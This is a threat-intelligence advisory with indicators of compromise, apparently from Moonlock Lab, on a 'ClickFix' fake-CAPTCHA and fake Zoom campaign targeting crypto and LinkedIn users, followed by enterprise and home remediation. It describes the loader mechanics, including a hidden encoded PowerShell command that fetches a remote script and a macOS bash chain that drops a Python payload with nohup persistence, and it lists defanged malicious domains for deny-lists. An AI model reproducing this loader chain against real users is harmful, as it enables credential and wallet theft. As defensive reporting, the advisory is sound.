Technical Analysis & Remediations
MITRE ATT&CK Mapping
T1566.002
(Phishing: Spearphishing Link)
T1204.001
(User Execution: Malicious Link)
T1059.001
(Command and Scripting Interpreter: PowerShell)
T1059.004
(Command and Scripting Interpreter: Unix Shell)
T1140
(Deobfuscate/Decode Files or Information)
CVE Profile
N/A [Relies on user execution/social engineering, not vulnerability exploitation].
Telemetry
Hashes (SHA-256)
9a778d2b7919717e95072e4dec01c815a5fd81f574b538107652d73d8dc874b6
(Obfuscated Mach-O, 9.3 MB)
2fbd34eed9dbf57a44cf1540941fb43a793be27e13e937299167b2b67cb84d6b
(Non-obfuscated Mach-O, 37.6 KB)
755cc133ae0519accbcfdd5f8f0d9fe1aa08cbcb306c3e5f29ebcb6ac12d9323
(Fake Zoom macOS App)
Domains
zoom[.]us07-web[.]us
zoom[.]07usweb[.]us
zoom[.]us05-web[.]us
goog1e[.]us-meet[.]com
hedgeweeks[.]online
lumex[.]capital
Identities
"Mykhailo Hureiev"
"Anatolli Bigdasch"
SolidBit Capital
MegaBit
Lumax Capital
Payload Mechanics
Windows: Clipboard injection drops powershell -w h -nop -eC <base64>, which decodes to an in-memory Invoke-Expression call fetching a remote script from hedgeweeks[.]online.
macOS
Clipboard injection executes a bash script that installs Homebrew/Python3 (if missing), downloads a Python payload to /tmp/hduwhv.py, and establishes persistence via nohup bash &.
Remediation - THE ENTERPRISE TRACK (NIST SP 800-61r3 / CSF 2.0)
GOVERN (GV) – Crisis Management & Oversight
Command
Issue an immediate security bulletin to all staff (especially HR, Recruiting, and Web3/Crypto dev teams) warning of LinkedIn/Calendly impersonation schemes and the "ClickFix" verification tactic.
DETECT (DE) – Monitoring & Analysis
Command
Query EDR for PowerShell executions utilizing -w h -nop -eC flags originating from browser processes.
Command
Query EDR for macOS shell executions initiating curl requests with the exact User-Agent string "User-Agent: macintosh".
Command
Ingest the provided domain list (zoom[.]us07-web[.]us, hedgeweeks[.]online, etc.) into SIEM and proxy deny-lists.
RESPOND (RS) – Mitigation & Containment
Command
Isolate any endpoints showing connections to hedgeweeks[.]online or anomalous nohup python background processes on macOS.
RECOVER (RC) – Restoration & Trust
Command
Rebuild compromised systems from a known clean state, as the in-memory/fileless nature of the loaders makes total eradication verification difficult without full forensic imaging.
IDENTIFY & PROTECT (ID/PR) – The Feedback Loop
Command
Implement application control (e.g., AppLocker or macOS endpoint security frameworks) to block unauthorized execution of scripts from temporary directories (e.g., /tmp/).
Remediation - THE HOME USER TRACK (Safety Focus)
Priority 1: Safety
Command
If you were tricked into pasting code into your Windows Command Prompt/PowerShell or macOS Terminal after encountering a fake CAPTCHA, disconnect from the internet immediately.
Command
Do not log into cryptocurrency wallets, banking, or email until the device is verified clean.
Priority 2: Identity
Command
Reset passwords and rotate MFA keys for all sensitive accounts using a known clean device (e.g., a mobile phone on a cellular network).
Priority 3: Persistence
Command
For macOS users, check for anomalous Python processes running in the background. Given the complexity of Mach-O FUD payloads and fileless PowerShell executions, backing up personal files and performing a clean OS reinstall is the safest remediation path.
Hardening & References
Baseline
Never copy-paste terminal commands from browser prompts. Legitimate CAPTCHA and Cloudflare verifications will never require local system terminal access.
Framework
NIST CSF 2.0 (PR.AT-1: Awareness and Training).
OSINT Verification
When approached by investment capital firms on LinkedIn, independently verify the firm's domain age (e.g., via WHOIS). Newly registered domains (like lumex[.]capital) paired with AI-generated staff photos are primary indicators of fraudulent intent.
Source
Moonlock Lab
